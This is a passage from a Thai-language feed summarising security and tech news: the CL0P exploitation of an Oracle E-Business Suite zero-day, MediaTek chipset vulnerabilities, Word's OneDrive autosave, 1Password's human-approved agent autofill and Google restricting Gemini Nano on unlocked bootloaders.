ส่งอีเมลข่มขู่ผู้บริหารพร้อมรายการไฟล์จริงจากระบบที่ถูกเจาะ ➡️ Oracle ออก patch ฉุกเฉินเมื่อ 4 ตุลาคม 2025 พร้อมแจก IoCs ✅ ข้อมูลเสริมจากภายนอก ➡️ Oracle EBS ใช้ในระบบสำคัญขององค์กร เช่น การเงิน, HR, โลจิสติกส์ ➡️ CL0P เคยโจมตี MOVEit, Cleo และ GoAnywhere ด้วย Zero-Day ลักษณะเดียวกัน ➡️ SSRF เป็นเทคนิคที่ใช้หลอกให้เซิร์ฟเวอร์เรียกข้อมูลจากแหล่งที่ผู้โจมตีควบคุม ➡️ XSLT injection สามารถใช้เรียกฟังก์ชัน Java เพื่อรันคำสั่งในระบบ ➡️ GOLDVEIN.JAVA ใช้การปลอม handshake TLS เพื่อหลบการตรวจจับ https://securityonline.info/cl0p-extortion-google-mandiant-expose-zero-day-rce-in-oracle-e-business-suite-cve-2025-61882/
    SECURITYONLINE.INFO
    CL0P Extortion: Google/Mandiant Expose Zero-Day RCE in Oracle E-Business Suite (CVE-2025-61882)
    Google/Mandiant linked CL0P extortion to a Zero-Day RCE flaw (CVE-2025-61882) in Oracle E-Business Suite. Attackers exploited the bug since July to steal corporate data and deploy GOLDVEIN Java shells.
    0 Comments 0 Shares 7 Views 0 Reviews
  • “MediaTek แจ้งเตือนช่องโหว่ร้ายแรงในชิป Wi-Fi และ GNSS — เสี่ยงถูกโจมตีจากระยะไกลผ่านคลื่นสัญญาณ”

    MediaTek ได้ออกประกาศ Product Security Bulletin ประจำเดือนตุลาคม 2025 โดยเปิดเผยช่องโหว่ความปลอดภัยระดับสูงและระดับกลางหลายรายการที่ส่งผลกระทบต่อชิปเซ็ต Wi-Fi (WLAN) และ GNSS (Global Navigation Satellite System) ที่ใช้ในอุปกรณ์ผู้บริโภคและ IoT ทั่วโลก

    ในส่วนของชิป Wi-Fi พบช่องโหว่ buffer overflow, heap overflow และ stack overflow หลายรายการ เช่น CVE-2025-20712, CVE-2025-20709, CVE-2025-20710 และ CVE-2025-20718 ซึ่งเกิดจากการตรวจสอบขอบเขตข้อมูลไม่ถูกต้อง ทำให้ผู้โจมตีสามารถเขียนข้อมูลเกินขอบเขตหน่วยความจำ และอาจนำไปสู่การรันโค้ดโดยไม่ได้รับอนุญาต หรือทำให้ระบบล่มได้

    ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986 และรุ่นใหม่อย่าง MT7990–MT7993 รวมถึงชิปรุ่นเก่าอย่าง MT7603 และ MT7622 ซึ่งยังคงใช้งานในอุปกรณ์หลายประเภท

    ในส่วนของ GNSS และ image sensor ก็พบช่องโหว่ระดับกลาง เช่น CVE-2025-20722 และ CVE-2025-20723 ที่เกิดจาก integer overflow และ out-of-bounds write ในการจัดการข้อมูลพิกัดและการแก้ไขข้อผิดพลาด ซึ่งอาจทำให้ระบบอ่านข้อมูลผิดพลาดหรือถูกโจมตีผ่านข้อมูลที่สร้างขึ้นโดยเจตนา

    MediaTek ระบุว่าได้แจ้งผู้ผลิตอุปกรณ์ (OEM) ล่วงหน้าก่อนเผยแพร่ประกาศนี้ และแนะนำให้ผู้ใช้ตรวจสอบว่าอุปกรณ์ได้รับการอัปเดต firmware ล่าสุดจากผู้ผลิตแล้ว เพื่อป้องกันการถูกโจมตีจากช่องโหว่เหล่านี้

    ข้อมูลสำคัญจากข่าว
    MediaTek ออกประกาศแจ้งเตือนช่องโหว่ในชิป Wi-Fi และ GNSS ประจำเดือนตุลาคม 2025
    ช่องโหว่ระดับสูงใน Wi-Fi ได้แก่ buffer overflow, heap overflow และ stack overflow
    CVE-2025-20712, CVE-2025-20709, CVE-2025-20710, CVE-2025-20718 เป็นช่องโหว่หลัก
    ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986, MT7990–MT7993
    ช่องโหว่ GNSS ได้แก่ CVE-2025-20722 และ CVE-2025-20723 เกิดจาก integer overflow
    ช่องโหว่ใน image sensor ได้แก่ CVE-2025-20721 ส่งผลต่อ MT6886, MT6899, MT8195, MT8793
    MediaTek แจ้ง OEM ล่วงหน้าและแนะนำให้ผู้ใช้ติดตั้ง firmware ล่าสุด

    ข้อมูลเสริมจากภายนอก
    ช่องโหว่ buffer overflow เป็นหนึ่งในวิธีโจมตีที่ใช้กันมากที่สุดในระบบ embedded
    GNSS เป็นระบบที่ใช้ในสมาร์ตโฟนและรถยนต์สำหรับระบุตำแหน่ง
    การโจมตีผ่าน Wi-Fi สามารถทำได้จากระยะไกลโดยไม่ต้องเข้าถึงตัวอุปกรณ์
    การอัปเดต firmware เป็นวิธีหลักในการป้องกันช่องโหว่ในอุปกรณ์ IoT
    CVSS v3.1 เป็นมาตรฐานที่ใช้ในการประเมินความรุนแรงของช่องโหว่

    https://securityonline.info/mediatek-issues-october-2025-security-bulletin-addressing-multiple-high-severity-vulnerabilities-across-wi-fi-and-gnss-chipsets/
    📡 “MediaTek แจ้งเตือนช่องโหว่ร้ายแรงในชิป Wi-Fi และ GNSS — เสี่ยงถูกโจมตีจากระยะไกลผ่านคลื่นสัญญาณ” MediaTek ได้ออกประกาศ Product Security Bulletin ประจำเดือนตุลาคม 2025 โดยเปิดเผยช่องโหว่ความปลอดภัยระดับสูงและระดับกลางหลายรายการที่ส่งผลกระทบต่อชิปเซ็ต Wi-Fi (WLAN) และ GNSS (Global Navigation Satellite System) ที่ใช้ในอุปกรณ์ผู้บริโภคและ IoT ทั่วโลก ในส่วนของชิป Wi-Fi พบช่องโหว่ buffer overflow, heap overflow และ stack overflow หลายรายการ เช่น CVE-2025-20712, CVE-2025-20709, CVE-2025-20710 และ CVE-2025-20718 ซึ่งเกิดจากการตรวจสอบขอบเขตข้อมูลไม่ถูกต้อง ทำให้ผู้โจมตีสามารถเขียนข้อมูลเกินขอบเขตหน่วยความจำ และอาจนำไปสู่การรันโค้ดโดยไม่ได้รับอนุญาต หรือทำให้ระบบล่มได้ ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986 และรุ่นใหม่อย่าง MT7990–MT7993 รวมถึงชิปรุ่นเก่าอย่าง MT7603 และ MT7622 ซึ่งยังคงใช้งานในอุปกรณ์หลายประเภท ในส่วนของ GNSS และ image sensor ก็พบช่องโหว่ระดับกลาง เช่น CVE-2025-20722 และ CVE-2025-20723 ที่เกิดจาก integer overflow และ out-of-bounds write ในการจัดการข้อมูลพิกัดและการแก้ไขข้อผิดพลาด ซึ่งอาจทำให้ระบบอ่านข้อมูลผิดพลาดหรือถูกโจมตีผ่านข้อมูลที่สร้างขึ้นโดยเจตนา MediaTek ระบุว่าได้แจ้งผู้ผลิตอุปกรณ์ (OEM) ล่วงหน้าก่อนเผยแพร่ประกาศนี้ และแนะนำให้ผู้ใช้ตรวจสอบว่าอุปกรณ์ได้รับการอัปเดต firmware ล่าสุดจากผู้ผลิตแล้ว เพื่อป้องกันการถูกโจมตีจากช่องโหว่เหล่านี้ ✅ ข้อมูลสำคัญจากข่าว ➡️ MediaTek ออกประกาศแจ้งเตือนช่องโหว่ในชิป Wi-Fi และ GNSS ประจำเดือนตุลาคม 2025 ➡️ ช่องโหว่ระดับสูงใน Wi-Fi ได้แก่ buffer overflow, heap overflow และ stack overflow ➡️ CVE-2025-20712, CVE-2025-20709, CVE-2025-20710, CVE-2025-20718 เป็นช่องโหว่หลัก ➡️ ชิปที่ได้รับผลกระทบ ได้แก่ MT6890, MT7915, MT7916, MT7981, MT7986, MT7990–MT7993 ➡️ ช่องโหว่ GNSS ได้แก่ CVE-2025-20722 และ CVE-2025-20723 เกิดจาก integer overflow ➡️ ช่องโหว่ใน image sensor ได้แก่ CVE-2025-20721 ส่งผลต่อ MT6886, MT6899, MT8195, MT8793 ➡️ MediaTek แจ้ง OEM ล่วงหน้าและแนะนำให้ผู้ใช้ติดตั้ง firmware ล่าสุด ✅ ข้อมูลเสริมจากภายนอก ➡️ ช่องโหว่ buffer overflow เป็นหนึ่งในวิธีโจมตีที่ใช้กันมากที่สุดในระบบ embedded ➡️ GNSS เป็นระบบที่ใช้ในสมาร์ตโฟนและรถยนต์สำหรับระบุตำแหน่ง ➡️ การโจมตีผ่าน Wi-Fi สามารถทำได้จากระยะไกลโดยไม่ต้องเข้าถึงตัวอุปกรณ์ ➡️ การอัปเดต firmware เป็นวิธีหลักในการป้องกันช่องโหว่ในอุปกรณ์ IoT ➡️ CVSS v3.1 เป็นมาตรฐานที่ใช้ในการประเมินความรุนแรงของช่องโหว่ https://securityonline.info/mediatek-issues-october-2025-security-bulletin-addressing-multiple-high-severity-vulnerabilities-across-wi-fi-and-gnss-chipsets/
    SECURITYONLINE.INFO
    MediaTek Issues October 2025 Security Bulletin Addressing Multiple High-Severity Vulnerabilities Across Wi-Fi and GNSS Chipsets
    MediaTek's October Security Bulletin discloses multiple High-severity flaws in its WLAN and GNSS chipsets, including buffer and stack overflows that risk RCE via memory corruption.
    0 Comments 0 Shares 7 Views 0 Reviews
  • “Word for Windows เปลี่ยนเกม! บันทึกเอกสารลง OneDrive โดยอัตโนมัติ — สะดวกขึ้น แต่ผู้ใช้ต้องยอมรับการเปลี่ยนแปลง”

    Microsoft ประกาศการเปลี่ยนแปลงครั้งสำคัญในงานเปิดตัว OneDrive และ Copilot โดยระบุว่า Word for Windows จะเริ่มบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ พร้อมเปิดใช้งานฟีเจอร์ AutoSave ตั้งแต่เริ่มต้น โดยไม่ต้องให้ผู้ใช้กดบันทึกเองอีกต่อไป

    การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว และจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต ซึ่งหมายความว่าเมื่อผู้ใช้เปิดเอกสารใหม่ใน Word ระบบจะกำหนดชื่อไฟล์อัตโนมัติ (เช่น Document-2025-10-10) และบันทึกลง OneDrive ทันที โดยไม่ต้องเลือกตำแหน่งจัดเก็บก่อน

    แม้ผู้ใช้ยังสามารถเลือกบันทึกไฟล์ลงเครื่องได้ แต่หากไม่ตั้งค่าเอง Word จะถือว่า OneDrive เป็นตำแหน่งหลัก และแม้จะบันทึกลงเครื่อง ระบบก็ยังสร้างสำเนาในคลาวด์ไว้เสมอ ซึ่งทำให้เวอร์ชันบน OneDrive กลายเป็น “ต้นฉบับ” ส่วนไฟล์ในเครื่องเป็นเพียง “สำเนา”

    Microsoft ระบุว่าแนวทางนี้ช่วยให้ผู้ใช้สามารถเข้าถึงไฟล์ได้จากทุกอุปกรณ์ ป้องกันการสูญหายจากระบบล่ม และเปิดทางให้ฟีเจอร์ AI อย่าง Copilot ทำงานได้เต็มประสิทธิภาพ เช่น การแนะนำเนื้อหา การสรุปเอกสาร และการแก้ไขแบบอัจฉริยะ

    อย่างไรก็ตาม การเปลี่ยนแปลงนี้ก็สร้างคำถามด้านความเป็นส่วนตัวและการควบคุมข้อมูล โดยเฉพาะในองค์กรที่มีข้อกำหนดด้านการจัดเก็บข้อมูลภายใน และผู้ใช้ที่ไม่ต้องการให้เอกสารส่วนตัวถูกอัปโหลดขึ้นคลาวด์โดยอัตโนมัติ

    ข้อมูลสำคัญจากข่าว
    Word for Windows จะบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ
    ฟีเจอร์ AutoSave จะเปิดใช้งานทันทีตั้งแต่เริ่มสร้างเอกสาร
    เอกสารจะได้รับชื่อไฟล์อัตโนมัติและถูกจัดเก็บในคลาวด์ทันที
    แม้บันทึกลงเครื่อง ระบบยังสร้างสำเนาใน OneDrive เสมอ
    OneDrive ให้พื้นที่ฟรี 5GB และสามารถซื้อเพิ่มหรือสมัคร Microsoft 365
    การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว
    Microsoft เตรียมเปิดตัวแอป OneDrive ใหม่บน Windows 11 พร้อมฟีเจอร์ดูภาพและแก้ไขเร็วขึ้น
    การบันทึกลงคลาวด์ช่วยให้ Copilot ทำงานได้เต็มประสิทธิภาพ

    ข้อมูลเสริมจากภายนอก
    AutoSave เป็นฟีเจอร์ที่ช่วยลดความเสี่ยงจากการลืมบันทึกหรือระบบล่ม
    Copilot ใช้ข้อมูลจากเอกสารเพื่อช่วยสรุป แก้ไข และแนะนำเนื้อหา
    การบันทึกลงคลาวด์ช่วยให้สามารถทำงานร่วมกันแบบ real-time ได้
    การใช้ OneDrive เป็นตำแหน่งหลักช่วยให้มี version history และการกู้คืนไฟล์
    Microsoft 365 Family และ Personal ให้พื้นที่ OneDrive สูงสุดถึง 1TB

    https://securityonline.info/word-for-windows-will-soon-autosave-documents-to-onedrive-by-default-pushing-cloud-adoption/
    ☁️ “Word for Windows เปลี่ยนเกม! บันทึกเอกสารลง OneDrive โดยอัตโนมัติ — สะดวกขึ้น แต่ผู้ใช้ต้องยอมรับการเปลี่ยนแปลง” Microsoft ประกาศการเปลี่ยนแปลงครั้งสำคัญในงานเปิดตัว OneDrive และ Copilot โดยระบุว่า Word for Windows จะเริ่มบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ พร้อมเปิดใช้งานฟีเจอร์ AutoSave ตั้งแต่เริ่มต้น โดยไม่ต้องให้ผู้ใช้กดบันทึกเองอีกต่อไป การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว และจะทยอยปล่อยให้ผู้ใช้ทั่วไปในอนาคต ซึ่งหมายความว่าเมื่อผู้ใช้เปิดเอกสารใหม่ใน Word ระบบจะกำหนดชื่อไฟล์อัตโนมัติ (เช่น Document-2025-10-10) และบันทึกลง OneDrive ทันที โดยไม่ต้องเลือกตำแหน่งจัดเก็บก่อน แม้ผู้ใช้ยังสามารถเลือกบันทึกไฟล์ลงเครื่องได้ แต่หากไม่ตั้งค่าเอง Word จะถือว่า OneDrive เป็นตำแหน่งหลัก และแม้จะบันทึกลงเครื่อง ระบบก็ยังสร้างสำเนาในคลาวด์ไว้เสมอ ซึ่งทำให้เวอร์ชันบน OneDrive กลายเป็น “ต้นฉบับ” ส่วนไฟล์ในเครื่องเป็นเพียง “สำเนา” Microsoft ระบุว่าแนวทางนี้ช่วยให้ผู้ใช้สามารถเข้าถึงไฟล์ได้จากทุกอุปกรณ์ ป้องกันการสูญหายจากระบบล่ม และเปิดทางให้ฟีเจอร์ AI อย่าง Copilot ทำงานได้เต็มประสิทธิภาพ เช่น การแนะนำเนื้อหา การสรุปเอกสาร และการแก้ไขแบบอัจฉริยะ อย่างไรก็ตาม การเปลี่ยนแปลงนี้ก็สร้างคำถามด้านความเป็นส่วนตัวและการควบคุมข้อมูล โดยเฉพาะในองค์กรที่มีข้อกำหนดด้านการจัดเก็บข้อมูลภายใน และผู้ใช้ที่ไม่ต้องการให้เอกสารส่วนตัวถูกอัปโหลดขึ้นคลาวด์โดยอัตโนมัติ ✅ ข้อมูลสำคัญจากข่าว ➡️ Word for Windows จะบันทึกเอกสารใหม่ลง OneDrive โดยอัตโนมัติ ➡️ ฟีเจอร์ AutoSave จะเปิดใช้งานทันทีตั้งแต่เริ่มสร้างเอกสาร ➡️ เอกสารจะได้รับชื่อไฟล์อัตโนมัติและถูกจัดเก็บในคลาวด์ทันที ➡️ แม้บันทึกลงเครื่อง ระบบยังสร้างสำเนาใน OneDrive เสมอ ➡️ OneDrive ให้พื้นที่ฟรี 5GB และสามารถซื้อเพิ่มหรือสมัคร Microsoft 365 ➡️ การเปลี่ยนแปลงนี้เริ่มใช้กับผู้ใช้กลุ่ม Insider แล้ว ➡️ Microsoft เตรียมเปิดตัวแอป OneDrive ใหม่บน Windows 11 พร้อมฟีเจอร์ดูภาพและแก้ไขเร็วขึ้น ➡️ การบันทึกลงคลาวด์ช่วยให้ Copilot ทำงานได้เต็มประสิทธิภาพ ✅ ข้อมูลเสริมจากภายนอก ➡️ AutoSave เป็นฟีเจอร์ที่ช่วยลดความเสี่ยงจากการลืมบันทึกหรือระบบล่ม ➡️ Copilot ใช้ข้อมูลจากเอกสารเพื่อช่วยสรุป แก้ไข และแนะนำเนื้อหา ➡️ การบันทึกลงคลาวด์ช่วยให้สามารถทำงานร่วมกันแบบ real-time ได้ ➡️ การใช้ OneDrive เป็นตำแหน่งหลักช่วยให้มี version history และการกู้คืนไฟล์ ➡️ Microsoft 365 Family และ Personal ให้พื้นที่ OneDrive สูงสุดถึง 1TB https://securityonline.info/word-for-windows-will-soon-autosave-documents-to-onedrive-by-default-pushing-cloud-adoption/
    SECURITYONLINE.INFO
    Word for Windows Will Soon AutoSave Documents to OneDrive by Default, Pushing Cloud Adoption
    Microsoft Word's Windows preview build will now default to OneDrive and AutoSave for new documents, mirroring Microsoft's broader strategy to drive cloud storage and synchronization.
    0 Comments 0 Shares 3 Views 0 Reviews
  • “1Password เปิดตัว Secure Agentic Autofill — ป้องกันรหัสผ่านจาก AI ด้วยระบบอนุมัติแบบมนุษย์”

    ในยุคที่ AI agents เริ่มทำงานแทนมนุษย์ในเบราว์เซอร์ ตั้งแต่จองตั๋ว ไปจนถึงจัดการบัญชีผู้ใช้ ความสะดวกนี้กลับมาพร้อมความเสี่ยงด้านความปลอดภัย โดยเฉพาะเมื่อ AI สามารถเข้าถึงรหัสผ่านที่จัดเก็บไว้ใน password manager ได้โดยตรง

    เพื่อรับมือกับความเสี่ยงนี้ 1Password ได้เปิดตัวฟีเจอร์ใหม่ชื่อว่า “Secure Agentic Autofill” ซึ่งเป็นระบบที่ออกแบบมาเพื่อป้องกันไม่ให้ AI agents เข้าถึงข้อมูล credential โดยไม่ได้รับอนุญาตจากมนุษย์ก่อน

    หลักการทำงานคือ เมื่อ AI agent ต้องการกรอกข้อมูลเข้าสู่ระบบใด ๆ มันจะส่งคำขอไปยัง 1Password ซึ่งจะตรวจสอบ credential ที่เกี่ยวข้อง และแสดงหน้าต่างขออนุมัติจากผู้ใช้ผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ เมื่อผู้ใช้อนุมัติแล้ว ระบบจะส่งข้อมูลเข้าสู่เบราว์เซอร์ผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่สามารถเห็นหรือจัดเก็บรหัสผ่านได้เลย

    ฟีเจอร์นี้เปิดให้ใช้งานแบบ early access ผ่าน Browserbase ซึ่งเป็นแพลตฟอร์มสำหรับการสร้างและควบคุม AI agents ในเบราว์เซอร์ โดยนักพัฒนาสามารถเชื่อมต่อ vault ของ 1Password และกำหนดว่า agent ใดสามารถเข้าถึง credential ใดได้บ้าง

    แม้ระบบนี้จะเพิ่มความปลอดภัยอย่างมาก แต่ก็มีข้อแลกเปลี่ยนคือ ผู้ใช้ต้องอยู่เพื่ออนุมัติการกรอกข้อมูลทุกครั้ง ซึ่งอาจขัดกับแนวคิดของการทำงานอัตโนมัติเต็มรูปแบบ

    ข้อมูลสำคัญจากข่าว
    1Password เปิดตัวฟีเจอร์ Secure Agentic Autofill เพื่อป้องกัน AI agents เข้าถึงรหัสผ่าน
    ระบบใช้การอนุมัติจากมนุษย์ก่อนส่ง credential เข้าสู่เบราว์เซอร์
    การอนุมัติทำผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ
    ข้อมูลถูกส่งผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่เห็นรหัสผ่าน
    ฟีเจอร์เปิดให้ใช้งานผ่าน Browserbase สำหรับนักพัฒนา AI agent
    ผู้ใช้สามารถกำหนดว่า agent ใดเข้าถึง credential ใดได้บ้าง
    ระบบมี audit log เพื่อบันทึกว่า credential ถูกใช้เมื่อใดและอย่างไร

    ข้อมูลเสริมจากภายนอก
    Browserbase เป็นแพลตฟอร์มสำหรับสร้าง AI agent ที่ทำงานในเบราว์เซอร์
    AI agents เริ่มถูกใช้ในงานจริง เช่น การจัดซื้อ การ onboarding และการบริการลูกค้า
    ระบบ “human-in-the-loop” เป็นแนวทางที่นิยมในงาน AI ที่ต้องการความปลอดภัยสูง
    การใช้ credential แบบ just-in-time ช่วยลดความเสี่ยงจากการเก็บข้อมูลไว้ในระบบ
    การแยกตัวตนของ AI agent กับผู้ใช้จริงเป็นหัวใจของการรักษาความปลอดภัยในระบบอัตโนมัติ

    https://securityonline.info/1password-launches-secure-agentic-autofill-with-human-in-the-loop-to-protect-credentials-from-ai-agents/
    🔐 “1Password เปิดตัว Secure Agentic Autofill — ป้องกันรหัสผ่านจาก AI ด้วยระบบอนุมัติแบบมนุษย์” ในยุคที่ AI agents เริ่มทำงานแทนมนุษย์ในเบราว์เซอร์ ตั้งแต่จองตั๋ว ไปจนถึงจัดการบัญชีผู้ใช้ ความสะดวกนี้กลับมาพร้อมความเสี่ยงด้านความปลอดภัย โดยเฉพาะเมื่อ AI สามารถเข้าถึงรหัสผ่านที่จัดเก็บไว้ใน password manager ได้โดยตรง เพื่อรับมือกับความเสี่ยงนี้ 1Password ได้เปิดตัวฟีเจอร์ใหม่ชื่อว่า “Secure Agentic Autofill” ซึ่งเป็นระบบที่ออกแบบมาเพื่อป้องกันไม่ให้ AI agents เข้าถึงข้อมูล credential โดยไม่ได้รับอนุญาตจากมนุษย์ก่อน หลักการทำงานคือ เมื่อ AI agent ต้องการกรอกข้อมูลเข้าสู่ระบบใด ๆ มันจะส่งคำขอไปยัง 1Password ซึ่งจะตรวจสอบ credential ที่เกี่ยวข้อง และแสดงหน้าต่างขออนุมัติจากผู้ใช้ผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ เมื่อผู้ใช้อนุมัติแล้ว ระบบจะส่งข้อมูลเข้าสู่เบราว์เซอร์ผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่สามารถเห็นหรือจัดเก็บรหัสผ่านได้เลย ฟีเจอร์นี้เปิดให้ใช้งานแบบ early access ผ่าน Browserbase ซึ่งเป็นแพลตฟอร์มสำหรับการสร้างและควบคุม AI agents ในเบราว์เซอร์ โดยนักพัฒนาสามารถเชื่อมต่อ vault ของ 1Password และกำหนดว่า agent ใดสามารถเข้าถึง credential ใดได้บ้าง แม้ระบบนี้จะเพิ่มความปลอดภัยอย่างมาก แต่ก็มีข้อแลกเปลี่ยนคือ ผู้ใช้ต้องอยู่เพื่ออนุมัติการกรอกข้อมูลทุกครั้ง ซึ่งอาจขัดกับแนวคิดของการทำงานอัตโนมัติเต็มรูปแบบ ✅ ข้อมูลสำคัญจากข่าว ➡️ 1Password เปิดตัวฟีเจอร์ Secure Agentic Autofill เพื่อป้องกัน AI agents เข้าถึงรหัสผ่าน ➡️ ระบบใช้การอนุมัติจากมนุษย์ก่อนส่ง credential เข้าสู่เบราว์เซอร์ ➡️ การอนุมัติทำผ่าน Touch ID, PIN หรือวิธีการยืนยันตัวตนอื่น ๆ ➡️ ข้อมูลถูกส่งผ่านช่องทางเข้ารหัสแบบ end-to-end โดยที่ AI agent ไม่เห็นรหัสผ่าน ➡️ ฟีเจอร์เปิดให้ใช้งานผ่าน Browserbase สำหรับนักพัฒนา AI agent ➡️ ผู้ใช้สามารถกำหนดว่า agent ใดเข้าถึง credential ใดได้บ้าง ➡️ ระบบมี audit log เพื่อบันทึกว่า credential ถูกใช้เมื่อใดและอย่างไร ✅ ข้อมูลเสริมจากภายนอก ➡️ Browserbase เป็นแพลตฟอร์มสำหรับสร้าง AI agent ที่ทำงานในเบราว์เซอร์ ➡️ AI agents เริ่มถูกใช้ในงานจริง เช่น การจัดซื้อ การ onboarding และการบริการลูกค้า ➡️ ระบบ “human-in-the-loop” เป็นแนวทางที่นิยมในงาน AI ที่ต้องการความปลอดภัยสูง ➡️ การใช้ credential แบบ just-in-time ช่วยลดความเสี่ยงจากการเก็บข้อมูลไว้ในระบบ ➡️ การแยกตัวตนของ AI agent กับผู้ใช้จริงเป็นหัวใจของการรักษาความปลอดภัยในระบบอัตโนมัติ https://securityonline.info/1password-launches-secure-agentic-autofill-with-human-in-the-loop-to-protect-credentials-from-ai-agents/
    SECURITYONLINE.INFO
    1Password Launches Secure Agentic Autofill with Human-in-the-Loop to Protect Credentials from AI Agents
    1Password launched Secure Agentic Autofill to prevent AI agents from accessing credentials. It uses Touch ID for approval, creating a secure, human-in-the-loop workflow for web automation.
    0 Comments 0 Shares 4 Views 0 Reviews
  • “Google ปิดประตู Gemini Nano บนมือถือที่ปลดล็อก bootloader — นักพัฒนาและผู้ใช้สาย root อาจต้องเลือกระหว่างอิสระกับ AI”

    Google ได้ประกาศอย่างเป็นทางการผ่านเอกสาร ML Kit API ว่าอุปกรณ์ Android ที่มีการปลดล็อก bootloader จะไม่สามารถใช้งาน Gemini Nano ได้ ซึ่งเป็นโมเดล AI ขนาดเล็กที่ออกแบบมาให้ทำงานบนอุปกรณ์โดยตรง โดยไม่ต้องเชื่อมต่อกับคลาวด์

    Gemini Nano เป็นโมเดลที่ใช้พลังประมวลผลจาก GPU/NPU ภายในเครื่อง เพื่อให้สามารถตอบสนองได้รวดเร็วและรักษาความเป็นส่วนตัวของผู้ใช้ โดยไม่ต้องส่งข้อมูลขึ้นเซิร์ฟเวอร์ของ Google ซึ่งถือเป็นจุดเด่นที่ทำให้ผู้ใช้หลายคนชื่นชอบ

    แต่เมื่อ bootloader ถูกปลดล็อก ระบบจะถือว่าอุปกรณ์นั้น “ไม่ปลอดภัย” และจะปิดการเข้าถึง API ของ Gemini Nano โดยแสดงข้อความ “FEATURE_NOT_FOUND” ซึ่งหมายถึงฟีเจอร์ไม่สามารถใช้งานได้ในสถานะปัจจุบันของเครื่อง

    แม้ผู้ใช้จะเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่อง ก็ไม่สามารถแก้ไขปัญหานี้ได้ หาก bootloader ยังถูกปลดล็อกอยู่ ซึ่งส่งผลกระทบต่อผู้ใช้ที่ต้องการ root เครื่องหรือใช้ custom ROM เพื่อปรับแต่งระบบ

    แนวโน้มนี้สะท้อนถึงการเปลี่ยนแปลงของระบบ Android ที่เคยเปิดกว้างสำหรับนักพัฒนาและผู้ใช้ขั้นสูง แต่กำลังถูกจำกัดมากขึ้น โดยผู้ผลิตหลายรายเริ่มปิดกั้นการปลดล็อก bootloader หรือจำกัดให้ทำได้เพียงเครื่องเดียวต่อบัญชี

    แม้จะเป็นการตัดสินใจที่มีเหตุผลด้านความปลอดภัย แต่ก็สร้างความไม่พอใจให้กับผู้ใช้บางกลุ่มที่เคยใช้ฟีเจอร์ AI บนเครื่องอย่างเต็มประสิทธิภาพ

    ข้อมูลสำคัญจากข่าว
    Google ประกาศว่าอุปกรณ์ที่ปลดล็อก bootloader จะไม่สามารถใช้ Gemini Nano ได้
    Gemini Nano เป็นโมเดล AI ขนาดเล็กที่ทำงานบนอุปกรณ์โดยตรง
    การปลดล็อก bootloader ทำให้ระบบถือว่าอุปกรณ์ไม่ปลอดภัย
    API ของ Gemini Nano จะแสดงข้อความ “FEATURE_NOT_FOUND” บนเครื่องที่ปลดล็อก
    การเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่องไม่สามารถแก้ไขปัญหาได้
    ผู้ใช้ที่ root เครื่องหรือใช้ custom ROM จะไม่สามารถใช้ฟีเจอร์ AI บนเครื่องได้
    ผู้ผลิตหลายรายเริ่มจำกัดการปลดล็อก bootloader หรือยกเลิกฟีเจอร์นี้ไปเลย

    ข้อมูลเสริมจากภายนอก
    Gemini Nano ใช้ในฟีเจอร์อย่าง smart reply, audio summarization และ image description
    ML Kit API เป็นเครื่องมือสำหรับนักพัฒนาในการเรียกใช้ฟีเจอร์ AI บนอุปกรณ์ Android
    การปลดล็อก bootloader เป็นวิธีที่ใช้ในการติดตั้ง ROM แบบกำหนดเองหรือ root เครื่อง
    Android 16 เริ่มไม่เผยแพร่ device tree และ driver binaries ทำให้การพัฒนา custom ROM ยากขึ้น
    การจำกัด bootloader เป็นแนวทางที่ผู้ผลิตใช้เพื่อป้องกันการโจมตีและการ debug ที่ไม่พึงประสงค์

    https://securityonline.info/gemini-nano-block-google-locks-on-device-ai-access-for-smartphones-with-unlocked-bootloaders/
    📱 “Google ปิดประตู Gemini Nano บนมือถือที่ปลดล็อก bootloader — นักพัฒนาและผู้ใช้สาย root อาจต้องเลือกระหว่างอิสระกับ AI” Google ได้ประกาศอย่างเป็นทางการผ่านเอกสาร ML Kit API ว่าอุปกรณ์ Android ที่มีการปลดล็อก bootloader จะไม่สามารถใช้งาน Gemini Nano ได้ ซึ่งเป็นโมเดล AI ขนาดเล็กที่ออกแบบมาให้ทำงานบนอุปกรณ์โดยตรง โดยไม่ต้องเชื่อมต่อกับคลาวด์ Gemini Nano เป็นโมเดลที่ใช้พลังประมวลผลจาก GPU/NPU ภายในเครื่อง เพื่อให้สามารถตอบสนองได้รวดเร็วและรักษาความเป็นส่วนตัวของผู้ใช้ โดยไม่ต้องส่งข้อมูลขึ้นเซิร์ฟเวอร์ของ Google ซึ่งถือเป็นจุดเด่นที่ทำให้ผู้ใช้หลายคนชื่นชอบ แต่เมื่อ bootloader ถูกปลดล็อก ระบบจะถือว่าอุปกรณ์นั้น “ไม่ปลอดภัย” และจะปิดการเข้าถึง API ของ Gemini Nano โดยแสดงข้อความ “FEATURE_NOT_FOUND” ซึ่งหมายถึงฟีเจอร์ไม่สามารถใช้งานได้ในสถานะปัจจุบันของเครื่อง แม้ผู้ใช้จะเชื่อมต่ออินเทอร์เน็ตหรือรีสตาร์ทเครื่อง ก็ไม่สามารถแก้ไขปัญหานี้ได้ หาก bootloader ยังถูกปลดล็อกอยู่ ซึ่งส่งผลกระทบต่อผู้ใช้ที่ต้องการ root เครื่องหรือใช้ custom ROM 